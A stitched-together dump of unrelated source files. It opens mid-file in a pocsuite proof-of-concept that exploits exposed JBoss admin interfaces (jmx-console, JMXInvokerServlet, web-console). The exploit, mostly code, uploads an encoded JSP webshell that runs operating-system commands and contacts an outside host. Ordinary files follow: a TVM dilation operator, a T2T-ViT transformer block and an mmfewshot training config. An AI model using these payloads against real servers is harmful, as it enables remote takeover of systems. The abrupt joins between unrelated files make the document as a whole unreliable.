"%6b%5f%22%2b%77%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%3b%20%63"
"%68%65%63%6b%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20"
"%77%72%69%74%65%72%2e%63%6c%6f%73%65%28%29%3b%20%7d%20%65%6c%73%65%20"
"%69%66%20%28%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%64%22"
"%29%20%7c%7c%20%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%70"
"%63%6f%6e%66%69%67%22%29%29%20%63%68%65%63%6b%2e%67%65%74%49%6e%70%75"
"%74%53%74%72%65%61%6d%28%29%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73"
"%73%20%70%3b%20%69%66%20%28%53%79%73%74%65%6d%2e%67%65%74%50%72%6f%70"
"%65%72%74%79%28%22%6f%73%2e%6e%61%6d%65%22%29%2e%74%6f%4c%6f%77%65%72"
"%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%22%77%69%6e%22%29%20%3e"
"%20%30%29%7b%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e"
"%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%6d%64%2e%65%78%65%20%2f%63"
"%20%22%2b%73%68%29%3b%20%7d%20%65%6c%73%65%20%7b%70%20%3d%20%52%75%6e"
"%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28"
"%73%68%29%3b%7d%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%64%20"
"%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65"
"%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67"
"%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%53%74%72%69"
"%6e%67%20%64%69%73%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b"
"%20%77%68%69%6c%65%20%28%64%69%73%72%20%21%3d%20%6e%75%6c%6c%29%20%7b"
"%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73"
"%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%63%61"
"%74%63%68%28%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%6f%75%74%2e%70"
"%72%69%6e%74%6c%6e%28%22%55%6e%6b%6e%6f%77%6e%20%63%6f%6d%6d%61%6e%64"
"%2e%22%29%3b%7d%7d%25%3e")
payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jexws.war&argType=java.lang.String&arg1=jexws&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_invoker_file_repository(self,url, version):
"""
Exploits the JMX invoker
tested and works in JBoss 4, 5
MainDeploy, shell in data
# /invoker/JMXInvokerServlet
:param url: The URL to exploit
:return:
"""
payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c"
"\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4"
"\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72"
"\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72"
"\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65"
"\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65"
"\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70")
payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a")
payload += (
"\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75"
"\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00"
"\x00\x00\x05\xaa\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29"
"\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78"
"\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e"
"\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c"
"\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65"
"\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f"
"\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e"
"\x00\x00\x00\x00\x00\x05\x74\x00\x0a\x6a\x65\x78\x69\x6e\x76\x2e\x77\x61\x72"
"\x74\x00\x06\x6a\x65\x78\x69\x6e\x76\x74\x00\x04\x2e\x6a\x73\x70\x74\x04\x71"
"\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61"
"\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
"\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67\x65\x45"
"\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e\x3c\x70"
"\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74"
"\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d"
"\x20\x6e\x75\x6c\x6c\x29\x7b\x20\x55\x52\x4c\x20\x75\x72\x6c\x20\x3d\x20\x6e"
"\x65\x77\x20\x55\x52\x4c\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73"
"\x68\x65\x6c\x6c\x2e\x6a\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x22\x29"
"\x3b\x20\x48\x74\x74\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e"
"\x20\x63\x68\x65\x63\x6b\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c\x43\x6f"
"\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x75\x72\x6c\x2e\x6f\x70\x65\x6e\x43"
"\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x53\x74\x72\x69\x6e\x67"
"\x20\x77\x72\x69\x74\x65\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x20\x3d\x20"
"\x28\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e"
"\x67\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22"
"\x68\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28"
"\x22\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x73"
"\x68\x5b\x5d\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
"\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x2e\x73\x70\x6c\x69"
"\x74\x28\x22\x20\x22\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x73\x65\x74\x52\x65"
"\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72"
"\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65"
"\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73\x74\x22\x29\x2b\x22\x3c\x2d"
"\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x52\x65\x6d\x6f\x74\x65"
"\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20\x28\x21\x6e\x65\x77\x20\x46"
"\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70"
"\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29"
"\x29\x7b\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74"
"\x65\x72\x20\x3d\x20\x6e\x65\x77\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65"
"\x72\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70\x65\x72"
"\x6d\x69\x73\x73\x69\x6f\x6e\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x67\x65\x74"
"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x20\x77\x72\x69\x74"
"\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20"
"\x69\x66\x20\x28\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28"
"\x22\x69\x64\x22\x29\x20\x7c\x7c\x20\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74"
"\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x29\x29\x20\x63"
"\x68\x65\x63\x6b\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d"
"\x28\x29\x3b\x20\x74\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70"
"\x3b\x20\x69\x66\x20\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f"
"\x70\x65\x72\x74\x79\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f"
"\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66"
"\x28\x22\x77\x69\x6e\x22\x29\x20\x3e\x20\x30\x29\x7b\x20\x70\x20\x3d\x20\x52"
"\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x7a\x00"
"\x00\x01\xb2\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x7b"
"\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74"
"\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68\x29\x3b\x7d\x20\x42\x75"
"\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x64\x20\x3d\x20\x6e\x65"
"\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65"
"\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72"
"\x28\x70\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29"
"\x29\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64"
"\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20"
"\x28\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75"
"\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69"
"\x73\x72\x20\x3d\x20\x64\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20"
"\x7d\x20\x7d\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20"
"\x65\x29\x20\x7b\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e"
"\x6b\x6e\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x7d\x7d"
"\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f\x6f"
"\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05\x76"
"\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"
"\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47"
"\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x0f"
"\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x69\x0e\x8b\x92"
"\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67\x2e"
"\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e"
"\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9"
"\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x04"
"\x70\x78")
headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexinv/jexinv.jsp")
def exploit_web_console_invoker(self,url):
"""
Exploits web console invoker
Does not work in JBoss 5 (bug in JBoss5)
:param url: The URL to exploit
:return: The HTTP status code
"""
payload = (
"\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f"
"\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f"
"\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e"
"\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
"\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c"
"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00"
"\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72"
"\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61"
"\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65"
"\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75"
"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65"
"\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00"
"\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25"
"\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64"
"\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74"
"\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c"
"\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f"
"\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01"
"\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0e\x2f\x72\x6e\x70\x2f\x6a\x65\x78"
"\x77\x73\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70\x70"
"\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x73"
"\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74"
"\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf"
"\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f"
"\x79\x65\x72\x78")
headers = {
"Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexws/jexws.jsp")
def auto_exploit(self,url, exploit_type):
result = 505
if exploit_type == "jmx-console":
result = self.exploit_jmx_console_file_repository(url)
if result != 200 and result != 500:
result = self.exploit_jmx_console_main_deploy(url)
elif exploit_type == "web-console":
result = self.exploit_web_console_invoker(url)
elif exploit_type == "JMXInvokerServlet":
result = self.exploit_jmx_invoker_file_repository(url, 0)
if result != 200 and result != 500:
result = self.exploit_jmx_invoker_file_repository(url, 1)
if result == 200 or result == 500:
return True
def poc(self,url):
"""
        Probe the three known JBoss admin endpoints and, if one is exposed, attempt to exploit it
        :param url: The URL to test
        :return: True if exploitation appears successful, otherwise False
"""
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console": "/web-console/ServerInfo.jsp",
"JMXInvokerServlet": "/invoker/JMXInvokerServlet"}
step1 = False
exploit_type = ''
for i in paths.keys():
try:
r = pool.request('HEAD', url + str(paths[i]), redirect=True, headers=headers, timeout=3)
paths[i] = r.status
if paths[i] == 200 or paths[i] == 500:
step1 = True
exploit_type = str(i)
else:
pass
except Exception:
paths[i] = 505
if step1:
step2 = False
try:
step2 = self.auto_exploit(url, exploit_type)
except Exception, e:
pass
return step2
else:
return False
    # verify the vulnerability: pocsuite -r 13-JBoss-serialization-getshell.py -u 192.168.127.12:8087 --verify
def _verify(self):
        # define the result dict to return
        result = {}
        # get the vulnerable URL
        vul_url = '%s' % self.url
        # use the specified port if one is set, otherwise fall back to the default port
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else :
_host = url2ip(vul_url)
_port = "8087"
vul_host = _host + ":" + _port
#print vul_host
try:
vul_result = self.poc(vul_host)
except Exception, e:
vul_result = False
if vul_result:
#print u"发现漏洞"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = vul_host + "https://github.com/joaomatosf/jexboss"
#print r_content
#from bs4 import BeautifulSoup
#soup = BeautifulSoup(r_content,'html.parser')
#print soup.h1.string
print '[+]13 poc done'
return self.save_output(result)
    # exploit the vulnerability
def _attack(self):
result = {}
        # attack code
# https://github.com/joaomatosf/jexboss
return self._verify()
def save_output(self, result):
        # check whether there is a result and output accordingly
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(JbossPOC)
|
python/tvm/topi/nn/dilate.py | XiaoSong9905/tvm | 4,640 | 12610792 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Dilation operators"""
import tvm
from tvm import te
from .. import utils
from .. import tag
@te.tag_scope(tag=tag.INJECTIVE + ",dilate")
def dilate(data, strides, dilation_value=0.0, name="DilatedInput"):
"""Dilate data with given dilation value (0 by default).
Parameters
----------
data : tvm.te.Tensor
n-D, can be any layout.
strides : list / tuple of n ints
Dilation stride on each dimension, 1 means no dilation.
dilation_value : int/float, optional
Value used to dilate the input.
name : str, optional
The name prefix operators generated
Returns
-------
Output : tvm.te.Tensor
n-D, the same layout as data.
"""
n = len(data.shape)
if len(strides) != n:
raise ValueError("data dimension and strides size dismatch : %d vs %d" % (n, len(strides)))
ana = tvm.arith.Analyzer()
out_shape = tuple(ana.simplify((data.shape[i] - 1) * strides[i] + 1) for i in range(n))
def _dilate(*indices):
not_zero = []
index_tuple = []
idxdiv = tvm.tir.indexdiv
idxmod = tvm.tir.indexmod
for i in range(n):
if not utils.equal_const_int(strides[i], 1):
index_tuple.append(idxdiv(indices[i], strides[i]))
not_zero.append(idxmod(indices[i], strides[i]).equal(0))
else:
index_tuple.append(indices[i])
if not_zero:
not_zero = tvm.tir.all(*not_zero)
return tvm.tir.if_then_else(
not_zero, data(*index_tuple), tvm.tir.const(dilation_value, data.dtype)
)
return data(*index_tuple)
return te.compute(out_shape, _dilate, name=name)
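# Minimal usage sketch (shapes and strides below are illustrative only):
#   A = te.placeholder((1, 4, 4, 1), name="A")
#   B = dilate(A, [1, 2, 2, 1])
# B has shape (1, 7, 7, 1): A's values land on the stride-2 grid along the two
# middle axes and every other position holds dilation_value (0.0 by default).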
|
models/transformer_block.py | Hanqer/T2T-ViT | 931 | 12610804 | # Copyright (c) [2012]-[2021] Shanghai Yitu Technology Co., Ltd.
#
# This source code is licensed under the Clear BSD License
# LICENSE file in the root directory of this file
# All rights reserved.
"""
Borrowed from timm (https://github.com/rwightman/pytorch-image-models)
"""
import torch
import torch.nn as nn
import numpy as np
from timm.models.layers import DropPath
class Mlp(nn.Module):
def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, qk_scale=None, attn_drop=0., proj_drop=0.):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
self.scale = qk_scale or head_dim ** -0.5
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.attn_drop = nn.Dropout(attn_drop)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
def forward(self, x):
B, N, C = x.shape
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2]
attn = (q @ k.transpose(-2, -1)) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
x = self.proj(x)
x = self.proj_drop(x)
return x
class Block(nn.Module):
def __init__(self, dim, num_heads, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop=0., attn_drop=0.,
drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm):
super().__init__()
self.norm1 = norm_layer(dim)
self.attn = Attention(
dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale, attn_drop=attn_drop, proj_drop=drop)
self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()
self.norm2 = norm_layer(dim)
mlp_hidden_dim = int(dim * mlp_ratio)
self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)
def forward(self, x):
x = x + self.drop_path(self.attn(self.norm1(x)))
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
def get_sinusoid_encoding(n_position, d_hid):
''' Sinusoid position encoding table '''
def get_position_angle_vec(position):
return [position / np.power(10000, 2 * (hid_j // 2) / d_hid) for hid_j in range(d_hid)]
sinusoid_table = np.array([get_position_angle_vec(pos_i) for pos_i in range(n_position)])
sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2]) # dim 2i
sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2]) # dim 2i+1
return torch.FloatTensor(sinusoid_table).unsqueeze(0)
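# Example (sizes are illustrative): get_sinusoid_encoding(n_position=197, d_hid=768)
# returns a (1, 197, 768) float tensor, typically registered as a fixed,
# non-learnable positional embedding that is added to the token embeddings.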
|
configs/detection/mpsr/voc/split1/mpsr_r101_fpn_2xb2_voc-split1_1shot-fine-tuning.py | BIGWangYuDong/mmfewshot | 376 | 12610807 | _base_ = [
'../../../_base_/datasets/two_branch/few_shot_voc.py',
'../../../_base_/schedules/schedule.py', '../../mpsr_r101_fpn.py',
'../../../_base_/default_runtime.py'
]
# classes splits are predefined in FewShotVOCDataset
# FewShotVOCDefaultDataset predefine ann_cfg for model reproducibility.
data = dict(
train=dict(
dataset=dict(
type='FewShotVOCDefaultDataset',
ann_cfg=[dict(method='MPSR', setting='SPLIT1_1SHOT')],
num_novel_shots=1,
num_base_shots=1,
classes='ALL_CLASSES_SPLIT1')),
val=dict(classes='ALL_CLASSES_SPLIT1'),
test=dict(classes='ALL_CLASSES_SPLIT1'))
evaluation = dict(
interval=500, class_splits=['BASE_CLASSES_SPLIT1', 'NOVEL_CLASSES_SPLIT1'])
checkpoint_config = dict(interval=2000)
optimizer = dict(
lr=0.005,
paramwise_cfg=dict(
custom_keys=dict({'.bias': dict(lr_mult=2.0, decay_mult=0.0)})))
